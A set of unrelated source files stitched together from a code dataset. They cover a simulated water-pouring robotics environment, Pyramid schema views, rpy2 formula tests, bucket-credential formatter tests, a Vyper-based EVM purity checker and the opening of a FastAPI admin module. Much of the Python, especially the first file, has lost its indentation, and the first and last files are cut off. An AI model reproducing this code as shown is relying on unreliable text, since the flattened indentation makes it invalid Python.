# only create the glass and water, without setting their states
# this is only used in the pourwater amount env.
if create_only:
return
# no cached init states passed in
if states is None:
fluid_pos = np.ones((self.particle_num, self.dim_position))
# move water all inside the glass
fluid_radius = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
fluid_dis = np.array([1.0 * fluid_radius, fluid_radius * 0.5, 1.0 * fluid_radius])
lower_x = self.glass_params['glass_x_center'] - self.glass_params['glass_dis_x'] / 2. + self.glass_params['border']
lower_z = -self.glass_params['glass_dis_z'] / 2 + self.glass_params['border']
lower_y = self.glass_params['border']
if self.action_mode in ['sawyer', 'franka']:
lower_y += 0.56 # NOTE: robotics table
lower = np.array([lower_x, lower_y, lower_z])
cnt = 0
rx = int(self.fluid_params['dim_x'] * 1)
ry = int(self.fluid_params['dim_y'] * 1)
rz = int(self.fluid_params['dim_z'] / 1)
for x in range(rx):
for y in range(ry):
for z in range(rz):
fluid_pos[cnt][:3] = lower + np.array([x, y, z]) * fluid_dis # + np.random.rand() * 0.01
cnt += 1
pyflex.set_positions(fluid_pos)
print("stablize water!")
for _ in range(100):
pyflex.step()
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
in_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
not_in_glass = 1 - in_glass
not_total_num = np.sum(not_in_glass)
while not_total_num > 0:
max_height_now = np.max(water_state[:, 1])
fluid_dis = np.array([1.0 * fluid_radius, fluid_radius * 1, 1.0 * fluid_radius])
lower_x = self.glass_params['glass_x_center'] - self.glass_params['glass_dis_x'] / 4
lower_z = -self.glass_params['glass_dis_z'] / 4
lower_y = max_height_now
lower = np.array([lower_x, lower_y, lower_z])
cnt = 0
dim_x = config['fluid']['dim_x']
dim_z = config['fluid']['dim_z']
for w_idx in range(len(water_state)):
if not in_glass[w_idx]:
water_state[w_idx][:3] = lower + fluid_dis * np.array([cnt % dim_x, cnt // (dim_x * dim_z), (cnt // dim_x) % dim_z])
cnt += 1
pyflex.set_positions(water_state)
for _ in range(40):
pyflex.step()
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
in_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
not_in_glass = 1 - in_glass
not_total_num = np.sum(not_in_glass)
for _ in range(30):
pyflex.step()
else: # set to passed-in cached init states
self.set_state(states)
def _get_obs(self):
'''
return the observation based on the current flex state.
'''
if self.observation_mode == 'cam_rgb':
return self.get_image(self.camera_width, self.camera_height)
elif self.observation_mode == 'point_cloud':
particle_pos = np.array(pyflex.get_positions()).reshape([-1, 4])[:, :3].flatten()
            pos = np.zeros(shape=self.particle_obs_dim, dtype=float)  # np.float is removed in NumPy >= 1.24
pos[:len(particle_pos)] = particle_pos
return pos.flatten()
elif 'key_point' in self.observation_mode:
            pos = np.empty(0, dtype=float)
water_state = pyflex.get_positions().reshape([-1, 4])
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
in_poured_glass = float(np.sum(in_poured_glass)) / len(water_state)
in_control_glass = float(np.sum(in_control_glass)) / len(water_state)
cup_state = np.array([self.glass_x, self.glass_y, self.glass_rotation, self.glass_dis_x, self.glass_dis_z, self.height,
self.glass_distance + self.glass_x, self.poured_height, self.poured_glass_dis_x, self.poured_glass_dis_z,
self._get_current_water_height(), in_poured_glass, in_control_glass])
return np.hstack([pos, cup_state]).flatten()
else:
raise NotImplementedError
def compute_reward(self, obs=None, action=None, set_prev_reward=False):
"""
The reward is computed as the fraction of water in the poured glass.
NOTE: the obs and action params are made here to be compatiable with the MultiTask env wrapper.
"""
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
water_num = len(water_state)
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
good_water = in_poured_glass * (1 - in_control_glass)
good_water_num = np.sum(good_water)
reward = float(good_water_num) / water_num
return reward
def _get_info(self):
# Duplicate of the compute reward function!
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
water_num = len(water_state)
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
good_water = in_poured_glass * (1 - in_control_glass)
good_water_num = np.sum(good_water)
performance = float(good_water_num) / water_num
performance_init = performance if self.performance_init is None else self.performance_init # Use the original performance
return {
'normalized_performance': (performance - performance_init) / (self.reward_max - performance_init),
'performance': performance
}
def _step(self, action):
'''
action: np.ndarray of dim 1x3, (x, y, theta). (x, y) specifies the floor center coordinate, and theta
specifies the rotation.
'''
        # treat the action as an increment and clip its range
move = action[:2]
rotate = action[2]
move = np.clip(move, a_min=self.action_space.low[0], a_max=self.action_space.high[0])
rotate = np.clip(rotate, a_min=self.action_space.low[2], a_max=self.action_space.high[2])
dx, dy, dtheta = move[0], move[1], rotate
x, y, theta = self.glass_x + dx, self.glass_y + dy, self.glass_rotation + dtheta
# check if the movement of the pouring glass collide with the poured glass.
# the action only take effects if there is no collision
new_states = self.rotate_glass(self.glass_states, x, y, theta)
if not self.judge_glass_collide(new_states, theta) and self.above_floor(new_states, theta):
self.glass_states = new_states
self.glass_x, self.glass_y, self.glass_rotation = x, y, theta
else: # invalid move, old state becomes the same as the current state
self.glass_states[:, 3:6] = self.glass_states[:, :3].copy()
self.glass_states[:, 10:] = self.glass_states[:, 6:10].copy()
# pyflex takes a step to update the glass and the water fluid
self.set_shape_states(self.glass_states, self.poured_glass_states)
pyflex.step(render=True)
self.inner_step += 1
def create_glass(self, glass_dis_x, glass_dis_z, height, border):
"""
the glass is a box, with each wall of it being a very thin box in Flex.
each wall of the real box is represented by a box object in Flex with really small thickness (determined by the param border)
dis_x: the length of the glass
dis_z: the width of the glass
height: the height of the glass.
border: the thickness of the glass wall.
the halfEdge determines the center point of each wall.
Note: this is merely setting the length of each dimension of the wall, but not the actual position of them.
That's why left and right walls have exactly the same params, and so do front and back walls.
"""
center = np.array([0., 0., 0.])
quat = quatFromAxisAngle([0, 0, -1.], 0.)
boxes = []
# floor
halfEdge = np.array([glass_dis_x / 2. + border, border / 2., glass_dis_z / 2. + border])
boxes.append([halfEdge, center, quat])
# left wall
halfEdge = np.array([border / 2., (height) / 2., glass_dis_z / 2. + border])
boxes.append([halfEdge, center, quat])
# right wall
boxes.append([halfEdge, center, quat])
# back wall
halfEdge = np.array([(glass_dis_x) / 2., (height) / 2., border / 2.])
boxes.append([halfEdge, center, quat])
# front wall
boxes.append([halfEdge, center, quat])
for i in range(len(boxes)):
halfEdge = boxes[i][0]
center = boxes[i][1]
quat = boxes[i][2]
pyflex.add_box(halfEdge, center, quat)
return boxes
def rotate_glass(self, prev_states, x, y, theta):
'''
given the previous states of the glass, rotate it with angle theta.
update the states of the 5 boxes that form the box: floor, left/right wall, back/front wall.
rotate the glass, where the center point is the center of the floor or the top.
state:
0-3: current (x, y, z) coordinate of the center point
3-6: previous (x, y, z) coordinate of the center point
6-10: current quat
10-14: previous quat
'''
dis_x, dis_z = self.glass_dis_x, self.glass_dis_z
quat_curr = quatFromAxisAngle([0, 0, -1.], theta)
border = self.border
# states of 5 walls
states = np.zeros((5, self.dim_shape_state))
for i in range(5):
states[i][3:6] = prev_states[i][:3]
states[i][10:] = prev_states[i][6:10]
x_center = x
# rotation center is the floor center
rotate_center = np.array([x_center, y, 0.])
if self.action_mode == 'rotation_bottom':
# floor: center position does not change
states[0, :3] = np.array([x_center, y, 0.])
            # left wall: center must move right and move down.
            relative_coord = np.array([-(dis_x + border) / 2., (self.height) / 2., 0.])
            states[1, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # right wall
            relative_coord = np.array([(dis_x + border) / 2., (self.height) / 2., 0.])
            states[2, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # back wall
            relative_coord = np.array([0, (self.height) / 2., -(dis_z + border) / 2.])
            states[3, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # front wall
            relative_coord = np.array([0, (self.height) / 2., (dis_z + border) / 2.])
            states[4, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
elif self.action_mode == 'rotation_top':
# floor
relative_coord = np.array([0, -self.height, 0.])
states[0, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # left wall
            relative_coord = np.array([-(dis_x + border) / 2., -self.height / 2., 0.])
            states[1, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # right wall
            relative_coord = np.array([(dis_x + border) / 2., -self.height / 2., 0.])
            states[2, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # back wall
            relative_coord = np.array([0, -self.height / 2., -(dis_z + border) / 2.])
            states[3, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
            # front wall (include the border term, symmetric to the back wall)
            relative_coord = np.array([0, -self.height / 2., (dis_z + border) / 2.])
            states[4, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
states[:, 6:10] = quat_curr
return states
def init_glass_state(self, x, y, glass_dis_x, glass_dis_z, height, border):
'''
set the initial state of the glass.
'''
dis_x, dis_z = glass_dis_x, glass_dis_z
x_center, y_curr, y_last = x, y, 0.
quat = quatFromAxisAngle([0, 0, -1.], 0.)
# states of 5 walls
states = np.zeros((5, self.dim_shape_state))
# floor
states[0, :3] = np.array([x_center, y_curr, 0.])
states[0, 3:6] = np.array([x_center, y_last, 0.])
# left wall
states[1, :3] = np.array([x_center - (dis_x + border) / 2., (height ) / 2. + y_curr, 0.])
states[1, 3:6] = np.array([x_center - (dis_x + border) / 2., (height ) / 2. + y_last, 0.])
# right wall
states[2, :3] = np.array([x_center + (dis_x + border) / 2., (height ) / 2. + y_curr, 0.])
states[2, 3:6] = np.array([x_center + (dis_x + border) / 2., (height ) / 2. + y_last, 0.])
# back wall
states[3, :3] = np.array([x_center, (height ) / 2. + y_curr, -(dis_z + border) / 2.])
states[3, 3:6] = np.array([x_center, (height ) / 2. + y_last, -(dis_z + border) / 2.])
# front wall
states[4, :3] = np.array([x_center, (height ) / 2. + y_curr, (dis_z + border) / 2.])
states[4, 3:6] = np.array([x_center, (height ) / 2. + y_last, (dis_z + border) / 2.])
states[:, 6:10] = quat
states[:, 10:] = quat
return states
def set_shape_states(self, glass_states, poured_glass_states):
'''
set the the shape states of both glasses.
'''
all_states = np.concatenate((glass_states, poured_glass_states), axis=0)
pyflex.set_shape_states(all_states)
def in_glass(self, water, glass_states, border, height):
'''
judge whether a water particle is in the poured glass
water: [x, y, z, 1/m] water particle state.
'''
# floor, left, right, back, front
# state:
# 0-3: current (x, y, z) coordinate of the center point
# 3-6: previous (x, y, z) coordinate of the center point
# 6-10: current quat
# 10-14: previous quat
x_lower = glass_states[1][0] - border / 2.
x_upper = glass_states[2][0] + border / 2.
z_lower = glass_states[3][2] - border / 2.
z_upper = glass_states[4][2] + border / 2
y_lower = glass_states[0][1] - border / 2.
y_upper = glass_states[0][1] + height + border / 2.
x, y, z = water[:, 0], water[:, 1], water[:, 2]
res = (x >= x_lower) * (x <= x_upper) * (y >= y_lower) * (y <= y_upper) * (z >= z_lower) * (z <= z_upper)
return res
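    # Usage sketch (mirrors compute_reward): reshape the raw particle buffer
    # into (N, 4) rows of [x, y, z, 1/m]; the boolean mask's mean then gives
    # the fraction of water inside a glass, e.g.:
    #
    #     water = pyflex.get_positions().reshape([-1, self.dim_position])
    #     frac = self.in_glass(water, self.poured_glass_states,
    #                          self.poured_border, self.poured_height).mean()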
def judge_glass_collide(self, new_states, rotation):
'''
judge if the front wall of the pouring glass would collide with the front wall of the poured glass.
'''
pouring_right_wall_center = new_states[2][:3]
pouring_left_wall_center = new_states[1][:3]
# build the corner of the front wall of the control glass
r_corner1_relative_cord = np.array([self.border / 2., self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner1_real = rotate_rigid_object(center=pouring_right_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner1_relative_cord)
r_corner3_relative_cord = np.array([self.border / 2., -self.height / 2., self.glass_dis_z / 2 - self.border])
r_corner3_real = rotate_rigid_object(center=pouring_right_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner3_relative_cord)
r_corner5_relative_cord = np.array([-self.border / 2., -self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner5_real = rotate_rigid_object(center=pouring_left_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner5_relative_cord)
r_corner8_relative_cord = np.array([-self.border / 2., self.height / 2., self.glass_dis_z / 2 + self.border])
r_corner8_real = rotate_rigid_object(center=pouring_left_wall_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=r_corner8_relative_cord)
control_polygon = Polygon([r_corner1_real[:2], r_corner3_real[:2], r_corner5_real[:2], r_corner8_real[:2]])
left_wall_center = self.poured_glass_states[1][:3]
leftx, lefty = left_wall_center[0], left_wall_center[1]
right_wall_center = self.poured_glass_states[2][:3]
rightx, righty = right_wall_center[0], right_wall_center[1]
border = self.poured_border
target_front_corner1 = np.array([leftx - border / 2, lefty + self.poured_height / 2])
        target_front_corner2 = np.array([leftx - border / 2, lefty - self.poured_height / 2])
        target_front_corner3 = np.array([rightx + border / 2, righty - self.poured_height / 2])
        target_front_corner4 = np.array([rightx + border / 2, righty + self.poured_height / 2])
        target_polygon = Polygon([target_front_corner1, target_front_corner2, target_front_corner3, target_front_corner4])
res = control_polygon.intersects(target_polygon)
return res
def above_floor(self, states, rotation):
'''
judge all the floors are above the ground.
'''
floor_center = states[0][:3]
corner_relative = [
np.array([self.glass_dis_x / 2., -self.border / 2., self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., -self.border / 2., -self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., -self.border / 2., self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., -self.border / 2., -self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., self.border / 2. + self.height, self.glass_dis_z / 2.]),
np.array([self.glass_dis_x / 2., self.border / 2. + self.height, -self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., self.border / 2. + self.height, self.glass_dis_z / 2.]),
np.array([-self.glass_dis_x / 2., self.border / 2. + self.height, -self.glass_dis_z / 2.]),
]
for corner_rel in corner_relative:
corner_real = rotate_rigid_object(center=floor_center, axis=np.array([0, 0, -1]), angle=rotation,
relative=corner_rel)
if corner_real[1] < - self.border / 2:
return False
return True |
the-stack_0_19855 | from pyramid.httpexceptions import HTTPNotFound
from pyramid.view import view_config
from .etag import etag_app_version_effective_principals
from .interfaces import (
COLLECTIONS,
TYPES,
)
from .util import mutated_schema
def includeme(config):
config.add_route('schemas', '/profiles{slash:/?}')
config.add_route('schema', '/profiles/{type_name}.json')
config.add_route('schemap', '/profiles/{type_name}{slash:/?}')
config.add_route('schemas_map', '/profiles-map/')
config.add_route('schemas_titles', '/profiles-titles/')
config.scan(__name__)
def _apply_permission(collection, request):
def mutator(schema):
if 'permission' in schema:
if not request.has_permission(schema['permission'], collection):
schema = schema.copy()
schema['readonly'] = True
return schema
return mutator
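# Illustrative example of the mutator's effect (the permission name is a
# placeholder): if the request lacks 'import_items' on the collection, a
# schema fragment such as
#     {'permission': 'import_items', 'type': 'string'}
# comes back as
#     {'permission': 'import_items', 'type': 'string', 'readonly': True}
# while other fragments pass through unchanged.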
def _annotated_schema(type_info, request):
schema = type_info.schema.copy()
schema['@type'] = ['JSONSchema']
if type_info.factory is None:
return schema
collection = request.registry[COLLECTIONS][type_info.name]
return mutated_schema(
schema,
_apply_permission(collection, request),
)
@view_config(route_name='schema', request_method='GET',
decorator=etag_app_version_effective_principals)
@view_config(route_name='schemap', request_method='GET',
decorator=etag_app_version_effective_principals)
def schema(context, request):
type_name = request.matchdict['type_name']
types = request.registry[TYPES]
try:
type_info = types[type_name]
except KeyError:
raise HTTPNotFound(type_name)
return _annotated_schema(type_info, request)
@view_config(route_name='schemas', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas(context, request):
types = request.registry[TYPES]
schemas = {}
for type_info in types.by_item_type.values():
name = type_info.name
schemas[name] = _annotated_schema(type_info, request)
schemas['_subtypes'] = subtypes = {}
schemas['@type'] = ['JSONSchemas']
for name, type_info in types.abstract.items():
subtypes[name] = type_info.subtypes
return schemas
@view_config(route_name='schemas_map', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas_map(context, request):
types = request.registry[TYPES]
profiles_map = {}
for type_info in types.by_item_type.values():
if 'id' in type_info.schema:
profiles_map[type_info.name] = type_info.schema['id']
profiles_map['@type'] = ['JSONSchemas']
return profiles_map
@view_config(route_name='schemas_titles', request_method='GET',
decorator=etag_app_version_effective_principals)
def schemas_titles(context, request): # pylint: disable=unused-argument
'''Return mapping of all schema @types and their corresponding titles'''
types = request.registry[TYPES]
profiles_titles = {
type_info.name: type_info.schema['title']
for type_info in types.by_item_type.values()
if 'title' in type_info.schema
}
profiles_titles['@type'] = ['JSONSchemas']
return profiles_titles
|
the-stack_0_19857 | import unittest
import rpy2.robjects as robjects
rinterface = robjects.rinterface
class FormulaTestCase(unittest.TestCase):
def testNew(self):
fml = robjects.Formula("y ~ x")
self.assertEqual("formula", fml.rclass[0])
def testGetenvironment(self):
fml = robjects.Formula("y ~ x")
env = fml.getenvironment()
self.assertEqual("environment", env.rclass[0])
def testSetenvironment(self):
fml = robjects.Formula("y ~ x")
newenv = robjects.baseenv['new.env']()
env = fml.getenvironment()
self.assertFalse(newenv.rsame(env))
fml.setenvironment(newenv)
env = fml.getenvironment()
self.assertTrue(newenv.rsame(env))
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(FormulaTestCase)
return suite
if __name__ == '__main__':
unittest.main()
|
the-stack_0_19859 | from typing import Any, Awaitable, Callable, List, Tuple
import pytest
from dateutil.parser import isoparse
from neuro_sdk import Bucket, BucketCredentials, PersistentBucketCredentials
from neuro_cli.formatters.bucket_credentials import (
BucketCredentialFormatter,
BucketCredentialsFormatter,
SimpleBucketCredentialsFormatter,
)
async def test_bucket_credentials_formatter(rich_cmp: Any) -> None:
bucket = Bucket(
id="bucket",
name="test-bucket",
owner="user",
cluster_name="cluster",
provider=Bucket.Provider.AWS,
created_at=isoparse("2017-03-04T12:28:59.759433+00:00"),
imported=False,
)
credentials = PersistentBucketCredentials(
id="bucket-credentials",
name="test-credentials",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id=bucket.id,
credentials={
"key1": "value1",
"key2": "value2",
},
)
],
)
async def _get_bucket(bucket_id: str) -> Bucket:
assert bucket_id == bucket.id
return bucket
fmtr = BucketCredentialFormatter(get_bucket=_get_bucket)
rich_cmp(await fmtr(credentials))
CredListFixture = Tuple[
List[PersistentBucketCredentials], Callable[[str], Awaitable[Bucket]]
]
@pytest.fixture
def credentials_list_fixture() -> CredListFixture:
buckets = [
Bucket(
id="bucket-1",
name="test-bucket",
owner="user",
cluster_name="cluster",
created_at=isoparse("2017-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-2",
name="test-bucket-2",
owner="user",
cluster_name="cluster",
created_at=isoparse("2016-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-3",
name=None,
owner="user-2",
cluster_name="cluster",
created_at=isoparse("2018-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
Bucket(
id="bucket-4",
name=None,
owner="user",
cluster_name="cluster",
created_at=isoparse("2019-03-04T12:28:59.759433+00:00"),
provider=Bucket.Provider.AWS,
imported=False,
),
]
async def _get_bucket(bucket_id: str) -> Bucket:
return next(bucket for bucket in buckets if bucket.id == bucket_id)
credentials = [
PersistentBucketCredentials(
id="bucket-credentials-1",
name="test-credentials-1",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-1",
credentials={
"key1": "value1",
"key2": "value2",
},
),
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-2",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
PersistentBucketCredentials(
id="bucket-credentials-2",
name="test-credentials-3",
owner="user",
cluster_name="cluster",
read_only=True,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-3",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
PersistentBucketCredentials(
id="bucket-credentials-3",
name="test-credentials-3",
owner="user",
cluster_name="cluster",
read_only=False,
credentials=[
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-3",
credentials={
"key1": "value1",
"key2": "value2",
},
),
BucketCredentials(
provider=Bucket.Provider.AWS,
bucket_id="bucket-4",
credentials={
"key1": "value1",
"key2": "value2",
},
),
],
),
]
return credentials, _get_bucket
async def test_buckets_credentials_formatter_simple(
credentials_list_fixture: CredListFixture, rich_cmp: Any
) -> None:
fmtr = SimpleBucketCredentialsFormatter()
rich_cmp(await fmtr(credentials_list_fixture[0]))
async def test_buckets_credentials_formatter(
credentials_list_fixture: CredListFixture, rich_cmp: Any
) -> None:
fmtr = BucketCredentialsFormatter(credentials_list_fixture[1])
rich_cmp(await fmtr(credentials_list_fixture[0]))
|
the-stack_0_19861 | ## This Python source code hosts the Vyper LLL used for the purity checker.
## The purity checker scans a contract's bytecode to see if it uses any operations that rely on (external) mutable state.
## This code was ported from an original written in the deprecated Serpent: https://github.com/ethereum/research/blob/master/impurity/check_for_impurity.se
## The following are memory maps for each function:
# MEMORY MAP for `submit` method
# [320, 351]: addr, the input address, 32 bytes
# [352, 352+_EXTCODESIZE-1]: bytecode at addr, _EXTCODESIZE bytes
# [352+_EXTCODESIZE, 352+33*_EXTCODESIZE-32]: ops, array to hold processed opcodes, 32*_EXTCODESIZE bytes
# [352+33*_EXTCODESIZE, 352+65*_EXTCODESIZE-32]: pushargs, array to hold processed push arguments, 32*_EXTCODESIZE bytes
# [352+65*_EXTCODESIZE, 383+65*_EXTCODESIZE]: i, loop counter, 32 bytes
# MEMORY MAP for `check` method
# [320, 351]: addr, the input address, 32 bytes
from vyper import compile_lll, optimizer
from vyper.parser.parser import LLLnode
from vyper.opcodes import opcodes
def find_opcode_hex(opcode):
if opcode in opcodes:
return opcodes[opcode][0]
return opcode
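# For example, find_opcode_hex('BALANCE') resolves to 0x31 through vyper's opcode
# table, while numeric entries such as 0x46 pass through unchanged.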
banned_opcodes = map(find_opcode_hex,[
'BALANCE',
'ORIGIN',
'CALLER',
'GASPRICE',
'EXTCODESIZE',
'EXTCODECOPY',
'BLOCKHASH',
'COINBASE',
'TIMESTAMP',
'NUMBER',
'DIFFICULTY',
'GASLIMIT',
0x46, # rest of the 0x40 opcode space
0x47,
0x48,
0x49,
0x4a,
0x4b,
0x4c,
0x4d,
0x4e,
0x4f,
'SLOAD',
'SSTORE',
'GAS',
'CREATE',
'SELFDESTRUCT'
])
banned_opcodes_bitmask = sum([2**x for x in banned_opcodes])
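# The bitmask turns the banned-opcode test into a single AND in LLL. A plain
# Python sketch of ["and", banned_opcodes_bitmask, ["exp", 2, "_c"]]:
#
#     def is_banned(c):
#         return bool(banned_opcodes_bitmask & (2 ** c))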
invalid_if_banned = ["if",
["and", banned_opcodes_bitmask, ["exp", 2, "_c"]],
"invalid"]
is_push = ["and", ["le", 0x60, "_c"], ["le", "_c", 0x7f]]
def index_pushargs(index):
return ["add", ["add", 352, ["mul", 33, "_EXTCODESIZE"]], ["mul", 32, index]]
handle_push = ["seq",
["mstore", index_pushargs("_op"), ["div", ["mload", ["add", ["add", 352, ["mload", "_i"]], 1]], ["exp", 256, ["sub", 0x7f, "_c"]]]],
["mstore", "_i", ["add", ["sub", "_c", 0x5f], ["mload", "_i"]]]] # there is an extra -1 in here to account for the increment of the repeat loop; -0x5e ~> -0x5f from the serpent code
is_some_call = ["or", ["eq", "_c", 0xf1],
["or", ["eq", "_c", 0xf2], ["eq", "_c", 0xf4]]]
def index_ops(index):
return ["add", ["add", 352, "_EXTCODESIZE"], ["mul", 32, index]]
find_address = ["if", ["and", ["ge", "_op", 2],
["and", ["ge", ["mload", index_ops(["sub", "_op", 1])], 0x60],
["le", ["mload", index_ops(["sub", "_op", 1])], 0x7f]]],
["set", "_address_entry", ["sub", "_op", 2]],
["if",
["and", ["ge", "_op", 4],
["and", ["eq", ["mload", index_ops(["sub", "_op", 1])], 0x03],
["and", ["eq",
["mload", index_ops(["sub", "_op", 2])], 0x5a],
["and", ["ge",
["mload", index_ops(["sub", "_op", 3])], 0x60],
["le",
["mload", index_ops(["sub", "_op", 3])], 0x7f]]]]],
["set", "_address_entry", ["sub", "_op", 4]],
["if", ["and", ["ge", "_op", 2],
["eq",
["mload", index_ops(["sub", "_op", 1])], 0x5a]],
["set", "_address_entry", ["sub", "_op", 2]],
["if", ["and", ["ge", "_op", 2],
["eq",
["mload", index_ops(["sub", "_op", 1])], 0x90]],
["set", "_address_entry", ["sub", "_op", 2]],
["if", ["and", ["ge", "_op", 2],
["and", ["ge",
["mload", index_ops(["sub", "_op", 1])], 0x80],
["lt",
["mload", index_ops(["sub", "_op", 1])], 0x90]]],
["set", "_address_entry", ["sub", "_op", 2]],
"invalid"]]]]]
filter_address_usage = ["if", ["sload", ["add", ["sha3_32", 0], # self.approved_addrs
["mload", index_pushargs("_address_entry")]]],
["seq"],
["if", ["eq",
["mload", index_ops("_address_entry")], 0x30],
["seq"],
["if", ["eq",
["mload", index_ops("_address_entry")], 0x60],
["seq"],
"invalid"]]]
handle_some_call = ["with", "_address_entry", 0,
["seq",
find_address,
filter_address_usage]]
dispatch_compound_sequences = ["if", is_push,
handle_push,
["if", is_some_call,
handle_some_call]]
process_byte = ["seq",
invalid_if_banned,
dispatch_compound_sequences,
["mstore", ["add", ["add", 352, "_EXTCODESIZE"], ["mul", 32, "_op"]], "_c"],
["set", "_op", ["add", "_op", 1]]]
loop_body = ["if",
["ge", ["mload", "_i"], "_EXTCODESIZE"],
"break",
["with", "_c", ["mod", ["mload", ["add", 352, ["sub", ["mload", "_i"], 31]]], 256],
process_byte]]
purity_checker_lll = LLLnode.from_list(
["seq",
["return",
0,
["lll",
["seq",
["mstore", 28, ["calldataload", 0]],
["mstore", 32, 1461501637330902918203684832716283019655932542976],
["mstore", 64, 170141183460469231731687303715884105727],
["mstore", 96, -170141183460469231731687303715884105728],
["mstore", 128, 1701411834604692317316873037158841057270000000000],
["mstore", 160, -1701411834604692317316873037158841057280000000000],
["if",
["eq", ["mload", 0], 2710585003], # submit
["seq",
["calldatacopy", 320, 4, 32],
["assert", ["iszero", "callvalue"]],
["uclamplt", ["calldataload", 4], ["mload", 32]], # checking address input
# scan bytecode at address input
["with", "_EXTCODESIZE", ["extcodesize", ["mload", 320]], # addr
["if", ["eq", "_EXTCODESIZE", 0],
"invalid", # ban accounts with no code
["seq",
["extcodecopy", ["mload", 320], 352, 0, "_EXTCODESIZE"],
["with", "_i", ["add", 352, ["mul", 65, "_EXTCODESIZE"]],
["with", "_op", 0,
["repeat", "_i", 0,
115792089237316195423570985008687907853269984665640564039457584007913129639935,
loop_body]]]]]],
# approve the address `addr`
["sstore", ["add", ["sha3_32", 0], ["mload", 320]], 1],
["mstore", 0, 1],
["return", 0, 32],
"stop"]],
["if",
["eq", ["mload", 0], 3258357672], # check
["seq",
["calldatacopy", 320, 4, 32],
["assert", ["iszero", "callvalue"]],
["uclamplt", ["calldataload", 4], ["mload", 32]], # checking address input
["mstore", 0, ["sload", ["add", ["sha3_32", 0], ["mload", 320]]]],
["return", 0, 32],
"stop"]]],
0]]])
def lll_to_evm(lll):
return compile_lll.assembly_to_evm(compile_lll.compile_to_assembly(optimizer.optimize(lll)))
def purity_checker_data():
return lll_to_evm(purity_checker_lll)
def purity_checker_data_hex():
return '0x' + purity_checker_data().hex()
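# Illustrative entry point (a sketch, not part of the original module): dump the
# deploy bytecode so it can be fed to an external deployment tool.
if __name__ == '__main__':
    print(purity_checker_data_hex())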
|
the-stack_0_19863 | # -*- encoding: utf-8 -*-
"""
@File : __init__.py.py
@Time : 2020/4/2 21:04
@Author : chise
@Email : [email protected]
@Software: PyCharm
@info :
"""
from .databaseManage import AdminDatabase
from fastapi_admin.schema_tool import create_schema as create_schema_v2
from fastapi import APIRouter
from typing import Union, List, Any, Set
from .auth.views import login, create_create, create_superuser
from .publicDepends.paging_query import get_res_schema, page_query
from .schema_tool import create_page_schema
from .views import create_View, method_get_func
from typing import Optional
from .auth.models import User, Group, Permission, UserLog
from .auth.schemas import Token
from .schema_tools import create_schema
from .config.schemas import BaseConfig
from .config.models import Config
from .views.methods_get import model_get_func_fetch_one
from .auth.views import router as auth_router
class FastAPIAdmin:
"""
    Core class. Its main job is to register Models or Tables, generate the matching
    schemas and routes, and wire together Views, Models and schemas.
"""
_instance = None
    # Singleton router; every handler is registered on it, and it is attached to the app during initialization
    __router = None
    # Tables that have already been registered
    table = []
    # All registered schemas, kept to avoid duplicate registration
    schema = []
    # Tentative name; stores the generated class-based views
api_class = []
def __new__(cls, *args, **kwargs):
"""要求这个类是单例模式,保证只注册一次"""
if not cls._instance:
cls._instance = super().__new__(cls)
